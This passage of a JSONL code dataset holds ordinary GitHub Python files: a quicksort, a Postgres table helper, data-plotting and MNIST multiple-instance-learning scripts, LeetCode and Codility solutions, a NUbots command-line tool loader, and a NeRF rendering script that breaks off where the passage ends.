+{"seq_id":"17790472343","text":"# Quick Sort 퀵정렬\n# 비슷한 속도를 자랑하는 병합정렬도 있음\n\n# 원리 : 기준을 설정, 큰수와 작은 수를 교환하고 리스트를 반으로 나누는 방식\n\n'''\n퀵은 Pivot피벗이란 개념을 사용\n= 큰 숫자, 작은 숫자 교환 시의 교환 기준\n\n퀵 정렬 사용 전 피벗을 어떻게 설정할 지 명시 필요\n본 코드는 Hoare Partition 호어 분할 방식을 기준으로 적용\n\n호어 분할 - 리스트에서 첫 번째 데이터를 피벗으로 정함\n1. 왼쪽에서부터 피벗보다 큰 데이터를 선택\n2. 오른쪽에서부터 피벗보다 작은 데이터를 선택\n3. 둘을 교체\n4. 반복\n5. 1과 2에서 찾은 값이 서로 순서가 엇갈리면 작은 데이터와 피벗을 교체\n(ex. 큰=5번, 작=4번)\n6. 피벗을 제외하고 좌, 우를 각각 위 과정 반복\n\n\n보통 재귀로 구현하며, 종료 조건은 리스트 내 원소가 1개인 경우\n'''\narray = [5,7,9,0,3,1,6,2,4,8]\n\ndef quick_sort(array, start, end):\n if start >= end: #원소가 1개\n return\n pivot = start # 호어 분할\n left = start + 1\n right = end\n\n while left <= right:\n #피벗보다 큰 데이터 찾기\n while left <= end and array[left] <= array[pivot]:\n left += 1\n #피벗보다 작은 데이터\n while right > start and array[right] >= array[pivot]:\n right -= 1\n # 엇갈렸다면 교체 (피벗 - 작은데이터)\n if left > right:\n array[right], array[pivot] = array[pivot], array[right]\n else:\n array[left], array[right] = array[right],array[left]\n #분할 이후 왼쪽 + 오른쪽\n quick_sort(array, start, right -1)\n quick_sort(array, right + 1, end)\n\nquick_sort(array, 0, len(array) -1)\nprint(array)","repo_name":"rudgks8092/Book","sub_path":"CodingTest_with_Python/Chapter6_Sort/6-4(Quick).py","file_name":"6-4(Quick).py","file_ext":"py","file_size_in_byte":1802,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"35625096974","text":"import psycopg2\r\nimport os\r\nfrom dotenv import load_dotenv\r\n\r\n \r\ndef create_table() -> str:\r\n load_dotenv(override=True)\r\n connection = psycopg2.connect(os.getenv(\"DATABASE_URL\"))\r\n cur = connection.cursor()\r\n cur.execute(\"\\\r\n CREATE TABLE IF NOT EXISTS autoplius (\\\r\n id serial PRIMARY KEY,\\\r\n manufacturingDate int,\\\r\n engine_l float8,\\\r\n power_kw float8,\\\r\n mileage_km float8,\\\r\n gearbox_auto int,\\\r\n gearbox_manual int,\\\r\n price_euro int\\\r\n );\\\r\n \")\r\n connection.commit()\r\n return \"Table successfully created\"\r\n\r\ndef drop_table() -> str:\r\n\r\n load_dotenv(override=True)\r\n connection = psycopg2.connect(os.getenv(\"DATABASE_URL\"))\r\n cur = connection.cursor()\r\n cur.execute(\"\\\r\n DROP TABLE IF EXISTS autoplius;\\\r\n \")\r\n connection.commit()\r\n return \"Table autoplius was successfully dropped\"\r\n\r\ndef show_table() -> str:\r\n load_dotenv(override=True)\r\n connection = psycopg2.connect(os.getenv(\"DATABASE_URL\"))\r\n cur = connection.cursor()\r\n cur.execute(\"\\\r\n SELECT * from autoplius;\\\r\n \")\r\n return cur.fetchall()\r\n\r\ndef insert_example() -> str:\r\n load_dotenv(override=True)\r\n connection = psycopg2.connect(os.getenv(\"DATABASE_URL\"))\r\n cur = connection.cursor()\r\n cur.execute(\"insert into autoplius(\\\r\n manufacturingDate,\\\r\n engine_l,\\\r\n power_kw, \\\r\n mileage_km, \\\r\n gearbox_auto, \\\r\n gearbox_manual, \\\r\n price_euro) \\\r\n VALUES (2016, 1.5, 70.0, 188928.0, 0, 1, 7550 ) \\\r\n \")\r\n\r\nshow_table()","repo_name":"Folkas/project_24","sub_path":"packages/database.py","file_name":"database.py","file_ext":"py","file_size_in_byte":1581,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"72777061289","text":"def main():\n \"\"\"This program takes in the values of the ACT scores from every state\n and creates a histogram out of them.\"\"\"\n import readscores\n import numpy as np\n import matplotlib.pyplot as plt\n\n data = readscores.read_scored(\"actsat.txt\")\n counter = 0\n act_scores = []\n while counter < len(data):\n act_scores.append(float(data[counter][\"act_average_score\"]))\n counter += 1\n plt.hist(act_scores, bins=7, edgecolor=\"black\", color=\"blue\")\n plt.yticks(np.arange(0, 21, step=5))\n plt.ylabel(\"Number of States\")\n plt.xlabel(\"score out of 36\")\n plt.title(\"Histogram of ACT Scores\")\n plt.show()\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"adamponce/python_compiler","sub_path":"lab8/tests/python/scorehist.py","file_name":"scorehist.py","file_ext":"py","file_size_in_byte":690,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"30292314550","text":"from keras.datasets import mnist\n\nimport time\nimport os\nimport numpy as np\nimport random\nimport math\n\nimport tensorflow as tf\n\nconfig = tf.ConfigProto(allow_soft_placement=True)\nsess = tf.Session(config=config)\n\nfrom keras.models import Model\nfrom keras.layers import Input, Lambda, Dense, Conv2D, MaxPool2D, Dropout, GlobalAveragePooling2D, \\\n\tBatchNormalization, Flatten\nfrom keras.utils import to_categorical\n\nfrom keras import backend as K\n\nK.set_image_data_format('channels_first')\nK.set_session(sess)\n\nfrom loss import LossFunction as my_loss\nimport latent\n\nFV_LENGTH = 64\n\nfrom sklearn.cluster import KMeans\n\n\ndef get_model(loss_type, alpha):\n\t\"\"\"Builds simple AlexNet-like architecture\n\n Returns:\n Keras Model with adaptive loss function incorporated\n \"\"\"\n\n\t# Initialize Input parameters\n\tinput_img = Input(shape=(1, 28, 28), name='input_data')\n\tinput_feature = Input(shape=(10,), dtype='float32', name='input_feature')\n\tinput_y = Input(shape=(10,), dtype='float32', name='input_y')\n\n\t# Build simple CNN for digits classification\n\tx = Conv2D(64, (3, 3), activation='relu')(input_img)\n\tx = BatchNormalization()(x)\n\tx = MaxPool2D((2, 2))(x)\n\tx = Conv2D(32, (3, 3), activation='relu')(x)\n\tx = BatchNormalization()(x)\n\tx = MaxPool2D((2, 2))(x)\n\tx = Dropout(rate=0.2)(x)\n\tx = Flatten()(x)\n\tcnn_model = Dense(128, activation='relu')(x)\n\tcnn_model_output = Dense(10, activation='softmax', name='p_out')(cnn_model)\n\n\tloss_function = my_loss(loss_type, alpha, 10)\n\n\t# Use Lambda layer to implement our custom loss function\n\t# todo: implement custom Layer\n\toutput = Lambda(loss_function.loss_main, output_shape=(1,), name='joint_loss')(\n\t\t[input_y, cnn_model_output, input_feature])\n\n\tmibl_model = Model([input_img, input_feature, input_y], output)\n\n\treturn mibl_model\n \n\ndef minibatch_mibl_gen(x, y, batch_size, fmodel, num_instances, num_clusters=100, fraction_class=1.0):\n\t\"\"\"Generator for multiple instance learning framework\n\n Args:\n x, y: image data and labels (ndarray)\n batch_size: number of images per batch (int)\n fmodel: pretrained Keras autoencoder which outputs encoder per image (Keras Model)\n num_instances: number of images per bag (int)\n num_clusters: number of clusters to extract from latent space (int)\n fraction_class: percentage of bag which is reflective of bag label (float between 0 and 1)\n\n Returns:\n Batch containing image, label and estimated label\n \"\"\"\n\n # Get encodings from model\n\tx_latent = x.reshape((len(x), np.prod(x.shape[1:])))\n\tz_mean, z_log = fmodel.predict(x_latent, batch_size=100)\n\n\t# Perform KMeans once at start\n\tkmeans = KMeans(n_clusters=num_clusters, random_state=0).fit(z_mean)\n\tclass_mean = kmeans.cluster_centers_\n\tlabels = kmeans.labels_\n\n\twhile True:\n\n\t\ty_dense = np.argmax(y, axis=1)\n\t\tindices = np.arange(len(y))\n\t\tnp.random.shuffle(indices)\n\n\t\tnum_correct_instances = int(math.ceil(fraction_class * float(num_instances)))\n\t\tnum_random_instances = num_instances - num_correct_instances\n\n\t\tif num_correct_instances == 0:\n\t\t\traise (\"No positive labels in bag! We need to have a minimum of 1.\")\n\n\t\t# --------------- Setup MNIST-BAG --------------- \n\t\t# Split dataset so that a certain proportion of labels are in a bag\n\t\tif fraction_class < 1:\n\t\t\tsorted_classes = np.argsort(y_dense)\n\t\t\tif num_random_instances > 0:\n\t\t\t\tindices_toshuffle = np.array([])\n\t\t\t\tfor kdx in range(num_correct_instances, len(y_dense) - num_instances, num_instances):\n\t\t\t\t\tindices_toshuffle = np.concatenate((indices_toshuffle, np.arange(kdx, kdx + num_random_instances)),\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\taxis=0)\n\n\t\t\t\tindices_toshuffle = indices_toshuffle.astype('int32')\n\t\t\t\tnp.random.shuffle(indices_toshuffle)\n\n\t\t\t\ti = 0\n\t\t\t\tfor jdx in range(num_correct_instances, len(y_dense) - num_instances, num_instances):\n\t\t\t\t\tsorted_classes[jdx: jdx + num_random_instances] = sorted_classes[\n\t\t\t\t\t\t\tindices_toshuffle[i: min(len(y_dense), i + num_random_instances)]]\n\t\t\t\t\ti = i + num_random_instances\n\n\t\t# Shuffle bags\n\t\tsorted_classes = sorted_classes.reshape(int(len(y_dense) / num_instances), num_instances)\n\t\tnp.random.shuffle(sorted_classes)\n\t\tindices = sorted_classes.flatten()\n\n\t\t# Generate new bag-level labels\n\t\tnew_y = np.zeros((len(y), 1))\n\t\tfor idx in range(0, len(y), num_instances):\n\t\t\t\t# Retrieve label for first image in bag\n\t\t\t\tmax_occ = y_dense[indices[idx]]\n\t\t\t\tnp.random.shuffle(indices[idx:idx + num_instances])\t# shuffle images\n\n\t\t\t\t# Set \"real\" weak label\n\t\t\t\tnew_y[indices[idx: idx + num_instances]] = max_occ\n\n\t\t# Perform majority vote to get estimated class label per cluster\n\t\tnew_labels = np.zeros((num_clusters), dtype='int32')\n\t\tfor a in range(0, num_clusters):\n\t\t\tlst = new_y[np.where(labels == a)[0]].squeeze().astype('int32')\n\t\t\tcounts = np.bincount(lst, minlength=10)\n\t\t\tnew_labels[a] = np.argmax(counts)\n\n\n\t\ty_c = to_categorical(new_y.flatten(), 10)\n\t\tfor start_idx in range(0, len(new_y), batch_size):\n\n\t\t\t# Gather estimated class for current batch\n\t\t\tdist_cat = to_categorical(new_labels[labels[indices[start_idx: start_idx + batch_size]]], 10)\n\n\t\t\tyield [x[indices[start_idx: start_idx + batch_size]], dist_cat,\n\t\t\t\t\ty_c[indices[start_idx: start_idx + batch_size]]], y_c[indices[start_idx: start_idx + batch_size]]\n\n\ndef train_autoencoder(vae_model, vae_name, num_epochs=500):\n\t\"\"\" Train simple (variational) autoencoder\n\n Args:\n vae_model: \"vae\", \"conv_vae\" or \"ae\" depending on what type of model is to be trained (string)\n vae_name: location and name of model once trained (string)\n num_epochs: number of epochs for training (int)\n\n Returns:\n Trained Keras Model\n \"\"\"\n\tprint(vae_model.summary())\n\n\tprint(\"Training VAE model...\")\n\tstart_time = time.time()\n\t(x_train, y_train), _ = mnist.load_data()\n\tx_train = x_train[:, np.newaxis, ...] / 255.\n\tx_train = x_train.reshape((len(x_train), np.prod(x_train.shape[1:])))\n\n\tvae_model.fit(x_train, x_train, batch_size=batch_size, epochs=num_epochs)\n\tprint(\"completed in {:.3f}s\".format(time.time() - start_time))\n\t\n\tprint(\"Trained variational autoencoder.\")\n\tvae_model.save('./latent_models/mnist_ae_64f_500e.h5')\n\n\treturn vae_model\n\n\ndef run_test_example(x_test, y_test, model):\n\t\"\"\"Simple predict function\n\n Returns:\n Test accuracy rate\n \"\"\"\n\tnew_model = Model(inputs=[model.get_layer('input_data').input],\n\t\t\t\t\t\t\toutputs=[model.get_layer('p_out').output])\n\n\tpredictions = new_model.predict(x_test, batch_size=64)\n\n\ttest_accuracy = float(np.sum(np.argmax(y_test, axis=1) == np.argmax(predictions, axis=1))) / len(y_test)\n\tprint(\"test accuracy: \", test_accuracy)\n\n\treturn test_accuracy\n\n\ndef get_latent_model(encoder_type, batch_size=100, latent_dim=FV_LENGTH):\n\t\"\"\"Calls function in latent.py depending on encoder_type - see train_autoencoder(...)\n \"\"\"\n\t\n\tif encoder_type == 'vae':\n\t\tvae_model = latent.get_vae_model(batch_size, latent_dim=latent_dim)\n\t\tvae_model.load_weights('./latent_models/mnist_vae_dense.h5')\n\t\tvae_model.outputs = [vae_model.get_layer('z_mean').output]\n\t\tvae_model._make_predict_function()\n\t\tvmodel = vae_model\n\t \n\telif encoder_type == 'conv_vae':\n\t\tdeepvae_model = latent.get_convvae_model()\n\t\tdeepvae_model.load_weights('./latent_models/mnist_vae_conv.h5')\n\t\tdeepvae_model.outputs = [deepvae_model.get_layer('z_mean').output]\n\t\tdeepvae_model._make_predict_function(batch_size, latent_dim=latent_dim)\n\t\tvmodel = deepvae_model\n\t \n\telse:\n\t\tae_model = latent.get_ae_model(batch_size, latent_dim=latent_dim)\n\t\tae_model.load_weights('./latent_models/mnist_ae.h5')\n\t\tae_model.outputs = [ae_model.get_layer('z').output]\n\t\tae_model._make_predict_function()\n\t\tvmodel = ae_model\n\t\n\treturn vmodel\n\t\n\nif __name__ == \"__main__\":\n\n\tbatch_size = 100\n\tloss_type = \"cluster_class\"\n\talpha = 0.5\n\tcluster_type = 'conv_vae'\n\tnum_k_clusters = 100\n\tnum_epochs = 5\n\n\tsearch_num_instances = [5, 25, 50, 100, 200]\n\tsearch_fraction = [0.5]\n\n\tstart_time = time.time()\n\tmibl_model = get_model(loss_type, alpha)\n\n\t# presave weights so that we can set it back to original model after training (see below)\n\told_weights = mibl_model.get_weights()\n\n\t(x_train, y_train), (x_test, y_test) = mnist.load_data()\n\tx_test = x_test[:, np.newaxis, ...] / 255.\n\tx_train = x_train[:, np.newaxis, ...] / 255.\n\ty_train = to_categorical(y_train, 10)\n\ty_test = to_categorical(y_test, 10)\n \n # train latent representation and save into predefined folder\n\tdeepvae_model = latent.get_convvae_model(latent_dim=FV_LENGTH)\n\t#train_autoencoder(deepvae_model, './latent_models/mnist_convvae_64f_500e.h5')\t\t\n\n\t# throw away the decoder part of the network\n\tdeepvae_model.load_weights('./latent_models/mnist_convvae_64f_500e.h5')\n\tdeepvae_model.outputs = [deepvae_model.get_layer('z_mean').output, deepvae_model.get_layer('z_log').output]\n\tdeepvae_model._make_predict_function()\n\n\tprint(\"Training CNN...\")\n\tfor s in search_num_instances:\n\t\tfor f in search_fraction:\n\t\t\t\n\t\t\ttest_accuracy = []\n\n\t\t\t# repeat same experiment 10 times to meaure variability\n\t\t\tfor r in range(10):\n\t\t\t\tni = s\n\t\t\t\tfraction = f\n\n\t\t\t\tmibl_model.compile(loss={'joint_loss': lambda y_true, y_pred: y_pred}, optimizer=\"adam\")\n\n\t\t\t\t# Train - MNIST-BAG prepared in generator\n\t\t\t\tmibl_model.fit_generator(\n\t\t\t\t\tminibatch_mibl_gen(x_train, y_train, batch_size, deepvae_model,\n\t\t\t\t\t\t\t\t\t\t\tni, num_clusters=num_k_clusters, fraction_class=f),\n\t\t\t\t\tsteps_per_epoch=len(y_train) / batch_size,\n\t\t\t\t\tepochs=num_epochs)\n\n\t\t\t\tacc = run_test_example(x_test, y_test, mibl_model)\n\t\t\t\ttest_accuracy.append(acc)\n\t\t\t\tmibl_model.set_weights(old_weights)\n\n\t\t\tprint(\">> n = \" + str(s) + \", a = \" + str(alpha) + \", fraction = \" + str(f))\n\t\t\tprint(\"mean accuracy: {}, std accuracy: {}\".format(np.mean(np.array(test_accuracy)), np.std(np.array(test_accuracy)))) \n\n# mibl_model.save(\"./mnist_model.h5\")\n","repo_name":"shaziaakbar/cluster-mil","sub_path":"mnist-bag.py","file_name":"mnist-bag.py","file_ext":"py","file_size_in_byte":9728,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"53"}
+{"seq_id":"71888510889","text":"# leetcode 1466. Reorder Routes to Make All Paths Lead to the City Zero\n# https://leetcode.com/problems/reorder-routes-to-make-all-paths-lead-to-the-city-zero/description/\nclass Solution:\n def minReorder(self, n: int, connections: List[List[int]]) -> int:\n roads = set()\n graph = defaultdict(set)\n\n for s, e in connections:\n roads.add((s, e))\n graph[s].add(e)\n graph[e].add(s)\n answer = 0\n q = deque()\n\n q.append((0, -1))\n\n while q:\n node, parent = q.popleft()\n if (parent, node) in roads:\n answer += 1\n\n for child in graph[node]:\n if child == parent:\n continue\n q.append((child, node))\n\n return answer","repo_name":"do0134/solostudy","sub_path":"algorithm/3월/0324/1sol.py","file_name":"1sol.py","file_ext":"py","file_size_in_byte":791,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"}
+{"seq_id":"73113857447","text":"#!/usr/bin/env python3\nimport argparse\nimport os\nimport pkgutil\nimport re\nimport sys\n\n# Don't make .pyc files\nsys.dont_write_bytecode = True\n\nscripts_dir = os.path.dirname(os.path.realpath(__file__))\nproject_dir = os.path.dirname(scripts_dir)\nbuild_dir = os.path.join(project_dir, \"build\")\n\n# Build our cmake cache\ncmake_cache = {}\n\ndirs = [build_dir]\ntry:\n dirs.extend([os.path.join(build_dir, f) for f in os.listdir(build_dir)])\nexcept FileNotFoundError:\n pass\n\nfor d in dirs:\n if os.path.isfile(os.path.join(d, \"CMakeCache.txt\")):\n with open(os.path.join(project_dir, d, \"CMakeCache.txt\"), \"r\") as f:\n cmake_cache_text = f.readlines()\n break\n\n# If we still didn't find anything\ntry:\n cmake_cache_text\nexcept NameError:\n cmake_cache_text = []\n\n# Go and process our lines in our cmake file\nfor l in cmake_cache_text:\n\n # Remove whitespace at the ends and start\n l = l.strip()\n\n # Remove lines that are comments\n if len(l) > 0 and not l.startswith(\"//\") and not l.startswith(\"#\"):\n # Extract our variable name from our values\n g = re.match(r\"([a-zA-Z_$][a-zA-Z_.$0-9-]*):(\\w+)=(.*)\", l).groups()\n\n # Store our value and split it into a list if it is a list\n cmake_cache[g[0]] = g[2] if \";\" not in g[2].strip(\";\") else g[2].strip(\";\").split(\";\")\n\n# Try to find our source and binary directories\ntry:\n binary_dir = cmake_cache[cmake_cache[\"CMAKE_PROJECT_NAME\"] + \"_BINARY_DIR\"]\nexcept KeyError:\n binary_dir = None\n\ntry:\n source_dir = cmake_cache[cmake_cache[\"CMAKE_PROJECT_NAME\"] + \"_SOURCE_DIR\"]\nexcept:\n source_dir = project_dir\n\nif __name__ == \"__main__\":\n\n # Root parser information\n command = argparse.ArgumentParser(\n description=\"This script is an optional helper script for performing common tasks for working with the NUClear roles system.\"\n )\n subcommands = command.add_subparsers(\n dest=\"command\", help=\"The command to run from the script. See each help for more information.\"\n )\n subcommands.required = True\n\n # Look through the various tools to see if we can find one that matches our arguments\n # If we do we don't need to load all the tools and can just trigger this one directly\n # This saves importing things we don't need\n for dirpath, dnames, fnames in os.walk(scripts_dir):\n for f in fnames:\n if f != \"__init__.py\" and f.endswith(\".py\"):\n\n # Check if this is the tool for the job\n components = os.path.relpath(os.path.join(dirpath, f[:-3]), scripts_dir).split(os.sep)\n if sys.argv[1 : len(components) + 1] == components:\n\n # Load the module\n module = pkgutil.find_loader(\".\".join(components)).load_module()\n if hasattr(module, \"register\") and hasattr(module, \"run\"):\n\n # Build up the base subcommands to this point\n subcommand = subcommands\n for c in components[:-1]:\n subcommand = subcommand.add_parser(c).add_subparsers(\n dest=\"{}_command\".format(c),\n help=\"Commands related to working with {} functionality\".format(c),\n )\n\n module.register(subcommand.add_parser(components[-1]))\n module.run(**vars(command.parse_args()))\n\n # We're done, exit\n exit(0)\n\n # If we reach this point, we couldn't find a tool to use.\n # In this case we need to look through all the tools so we can register them all.\n # This will provide a complete help for the function call so the user can try again\n tools = {}\n for importer, modname, ispkg in pkgutil.walk_packages([scripts_dir]):\n # Tools aren't in packages\n if not ispkg:\n\n # Load the modules and check it's a tool\n components = modname.split(\".\")\n try:\n module = pkgutil.find_loader(modname).load_module()\n if hasattr(module, \"register\") and hasattr(module, \"run\"):\n\n subcommand = subcommands\n tool = tools\n for c in components[:-1]:\n if c in tool:\n tool, subcommand = tool[c]\n else:\n subcommand = subcommand.add_parser(c).add_subparsers(\n dest=\"{}_command\".format(c),\n help=\"Commands related to working with {} functionality\".format(c),\n )\n subcommand.required = True\n tool[c] = ({}, subcommand)\n tool = tool[c][0]\n\n module.register(subcommand.add_parser(components[-1]))\n except ModuleNotFoundError as e:\n print(\"Could not load the tool '{}': {}\".format(modname.replace(\".\", \" \"), e))\n except BaseException as e:\n pass\n\n # Given what we know, this will fail here and give the user some help\n command.parse_args()\n","repo_name":"NUbots/NUWebots","sub_path":"scripts/b.py","file_name":"b.py","file_ext":"py","file_size_in_byte":5203,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"53"}
+{"seq_id":"29725464295","text":"def solution(N: int, A: list):\n max_val, tmp_max = 0, 0\n result = [0] * N\n for item in A:\n if item > N:\n max_val = tmp_max\n else:\n if result[item - 1] < max_val:\n result[item - 1] = max_val + 1\n else:\n result[item - 1] += 1\n tmp_max = max(tmp_max, result[item - 1])\n for idx in range(len(result)):\n if result[idx] < max_val:\n result[idx] = max_val\n return result\n\n\nA = [3, 4, 4, 6, 1, 4, 4]\nN = 5\nassert solution(N, A) == [3, 2, 2, 4, 2]\n","repo_name":"Dopiz/Codility-Lessons","sub_path":"Lesson 4 - MaxCounters.py","file_name":"Lesson 4 - MaxCounters.py","file_ext":"py","file_size_in_byte":559,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"30061114472","text":"#Ask the user for their name and save as variable name\r\nname = input(\"What is your name?\")\r\n\r\n#Check if their name is frank or george\r\nif name == \"frank\" or name == \"george\":\r\n\r\n #say hello\r\n print(\"Hello\" + \" \" + name)\r\n\r\n#if their name is not frank or george\r\nelse:\r\n\r\n #Say no\r\n print(\"Sorry, you cannot access the system\")","repo_name":"HBlack09/ICTPRG-Python","sub_path":"Introduction to Selection Quiz/Question 1.py","file_name":"Question 1.py","file_ext":"py","file_size_in_byte":346,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"27909999544","text":"import imageio\r\n\r\n# models\r\nfrom models import *\r\nfrom renderer import *\r\nfrom data.ray_utils import get_rays\r\nfrom scipy.spatial.transform import Rotation as R\r\n\r\nfrom tqdm import tqdm\r\n\r\n# pytorch-lightning\r\n\r\nfrom data.ray_utils import ray_marcher\r\nfrom data.llff import LLFFDataset\r\n\r\ntorch.cuda.set_device(0)\r\nos.environ['CUDA_VISIBLE_DEVICES'] = '0'\r\n\r\n\r\ndef decode_batch(batch):\r\n rays = batch['rays'] # (B, 8)\r\n rgbs = batch['rgbs'] # (B, 3)\r\n return rays, rgbs\r\n\r\n\r\ndef unpreprocess(data, shape=(1, 1, 3, 1, 1)):\r\n # to unnormalize image for visualization\r\n # data N V C H W\r\n device = data.device\r\n mean = torch.tensor([-0.485 / 0.229, -0.456 / 0.224, -0.406 / 0.225]).view(*shape).to(device)\r\n std = torch.tensor([1 / 0.229, 1 / 0.224, 1 / 0.225]).view(*shape).to(device)\r\n\r\n return (data - mean) / std\r\n\r\n\r\ndef normalize(x):\r\n return x / np.linalg.norm(x, axis=-1, keepdims=True)\r\n\r\n\r\ndef viewmatrix(z, up, pos):\r\n vec2 = normalize(z)\r\n vec1_avg = up\r\n vec0 = normalize(np.cross(vec1_avg, vec2))\r\n vec1 = normalize(np.cross(vec2, vec0))\r\n m = np.eye(4)\r\n m[:3] = np.stack([vec0, vec1, vec2, pos], 1)\r\n return m\r\n\r\n\r\ndef ptstocam(pts, c2w):\r\n tt = np.matmul(c2w[:3, :3].T, (pts - c2w[:3, 3])[..., np.newaxis])[..., 0]\r\n return tt\r\n\r\n\r\ndef poses_avg(poses):\r\n center = poses[:, :3, 3].mean(0)\r\n vec2 = normalize(poses[:, :3, 2].sum(0))\r\n up = poses[:, :3, 1].sum(0)\r\n c2w = viewmatrix(vec2, up, center)\r\n\r\n return c2w\r\n\r\n\r\ndef render_path_spiral(c2w, up, rads, focal, zdelta, zrate, N_rots=2, N=120):\r\n render_poses = []\r\n rads = np.array(list(rads) + [1.])\r\n\r\n for theta in np.linspace(0., 2. * np.pi * N_rots, N + 1)[:-1]:\r\n c = np.dot(c2w[:3, :4], np.array([np.cos(theta), -np.sin(theta), -np.sin(theta * zrate), 1.]) * rads)\r\n z = normalize(c - np.dot(c2w[:3, :4], np.array([0, 0, -focal, 1.])))\r\n render_poses.append(viewmatrix(z, up, c))\r\n return render_poses\r\n\r\n\r\ndef get_spiral(c2ws_all, near_far, rads_scale=0.5, N_views=120):\r\n # center pose\r\n c2w = poses_avg(c2ws_all)\r\n\r\n # Get average pose\r\n up = normalize(c2ws_all[:, :3, 1].sum(0))\r\n\r\n # Find a reasonable \"focus depth\" for this dataset\r\n close_depth, inf_depth = near_far\r\n dt = .75\r\n mean_dz = 1. / (((1. - dt) / close_depth + dt / inf_depth))\r\n focal = mean_dz\r\n\r\n # Get radii for spiral path\r\n zdelta = close_depth * .2\r\n tt = c2ws_all[:, :3, 3] - c2w[:3, 3][None]\r\n rads = np.percentile(np.abs(tt), 70, 0) * rads_scale\r\n render_poses = render_path_spiral(c2w, up, rads, focal, zdelta, zrate=.5, N=N_views)\r\n return np.stack(render_poses)\r\n\r\n\r\ndef position2angle(position):\r\n ''' nx3 '''\r\n position = normalize(position)\r\n theta = np.arccos(position[:, 2]) / np.pi * 180\r\n phi = np.arctan2(position[:, 1], position[:, 0]) / np.pi * 180\r\n return [theta, phi]\r\n\r\n\r\ndef pose_spherical_nerf(euler, radius=4.0):\r\n c2ws_render = np.eye(4)\r\n c2ws_render[:3, :3] = R.from_euler('xyz', euler, degrees=True).as_matrix()\r\n c2ws_render[:3, 3] = c2ws_render[:3, :3] @ np.array([0.0, 0.0, -radius])\r\n return c2ws_render\r\n\r\n\r\ndef nerf_video_path(c2ws, theta_range=10, phi_range=20, N_views=120):\r\n rotvec = []\r\n for i in range(c2ws.shape[0]):\r\n r = R.from_matrix(c2ws[i, :3, :3])\r\n euler_ange = r.as_euler('xyz', degrees=True).reshape(1, 3)\r\n if i:\r\n mask = np.abs(euler_ange - rotvec[0]) > 180\r\n euler_ange[mask] += 360.0\r\n rotvec.append(euler_ange)\r\n rotvec = np.mean(np.stack(rotvec), axis=0)\r\n render_poses = [pose_spherical_nerf(rotvec + np.array([angle, 0.0, -phi_range]), 4.0) for angle in\r\n np.linspace(-theta_range, theta_range, N_views // 4, endpoint=False)]\r\n render_poses += [pose_spherical_nerf(rotvec + np.array([theta_range, 0.0, angle]), 4.0) for angle in\r\n np.linspace(-phi_range, phi_range, N_views // 4, endpoint=False)]\r\n render_poses += [pose_spherical_nerf(rotvec + np.array([angle, 0.0, phi_range]), 4.0) for angle in\r\n np.linspace(theta_range, -theta_range, N_views // 4, endpoint=False)]\r\n render_poses += [pose_spherical_nerf(rotvec + np.array([-theta_range, 0.0, angle]), 4.0) for angle in\r\n np.linspace(phi_range, -phi_range, N_views // 4, endpoint=False)]\r\n render_poses = torch.from_numpy(np.stack(render_poses)).float().to(device)\r\n return render_poses\r\n\r\ndef render_video(args):\r\n for i_scene, scene in enumerate([args.datadir.split('/')[-1]]):\r\n if args.is_finetuned:\r\n args.ckpt = f'./runs_fine_tuning/{scene}/ckpts/latest.tar'\r\n args.video_name = 'DSft_'\r\n else:\r\n args.video_name = ''\r\n\r\n args.use_viewdirs = True\r\n args.feat_dim = 8 + 3 * 4\r\n\r\n # create models\r\n if i_scene == 0 or args.is_finetuned:\r\n # Create nerf model\r\n render_kwargs_train, render_kwargs_test, start, grad_vars = \\\r\n create_nerf_mvs(args, use_mvs=True, dir_embedder=False, pts_embedder=True)\r\n filter_keys(render_kwargs_train)\r\n # Create mvs model\r\n MVSNet = render_kwargs_train['network_mvs']\r\n render_kwargs_train.pop('network_mvs')\r\n\r\n datatype = 'val'\r\n pad = 24 # the padding value should be same as your finetuning ckpt\r\n args.chunk = 5120\r\n\r\n dataset = LLFFDataset(args, split=datatype)\r\n\r\n save_dir = f'./results'\r\n os.makedirs(save_dir, exist_ok=True)\r\n MVSNet.train()\r\n MVSNet = MVSNet.cuda()\r\n\r\n with torch.no_grad():\r\n\r\n c2ws_all = dataset.poses\r\n\r\n if args.is_finetuned:\r\n # large baseline\r\n imgs_source, proj_mats, near_far_source, pose_source = dataset.read_source_views(device=device)\r\n volume_feature = torch.load(args.ckpt)['volume']['feat_volume']\r\n volume_feature = RefVolume(volume_feature.detach()).cuda()\r\n\r\n pad *= args.imgScale_test\r\n pair_idx = torch.load('configs/pairs.th')[f'{scene}_train']\r\n c2ws_render = get_spiral(c2ws_all[pair_idx], near_far_source, rads_scale=0.6,\r\n N_views=180) # you can enlarge the rads_scale if you want to render larger baseline\r\n else:\r\n # neighboring views with position distance\r\n imgs_source, proj_mats, near_far_source, pose_source = dataset.read_source_views(device=device)\r\n volume_feature, _, _ = MVSNet(imgs_source, proj_mats, near_far_source, pad=pad, lindisp=args.use_disp)\r\n\r\n pad *= args.imgScale_test\r\n pair_idx = torch.load('configs/pairs.th')[f'{scene}_train']\r\n c2ws_render = get_spiral(c2ws_all[pair_idx], near_far_source, rads_scale=0.6,\r\n N_views=180) # you can enlarge the rads_scale if you want to render larger baseline\r\n\r\n c2ws_render = torch.from_numpy(np.stack(c2ws_render)).float().to(device)\r\n\r\n imgs_source = unpreprocess(imgs_source)\r\n\r\n try:\r\n tqdm._instances.clear()\r\n except Exception:\r\n pass\r\n\r\n frames = []\r\n img_directions = dataset.directions.to(device)\r\n for i, c2w in enumerate(tqdm(c2ws_render)):\r\n torch.cuda.empty_cache()\r\n\r\n rays_o, rays_d = get_rays(img_directions, c2w) # both (h*w, 3)\r\n rays = torch.cat([rays_o, rays_d,\r\n near_far_source[0] * torch.ones_like(rays_o[:, :1]),\r\n near_far_source[1] * 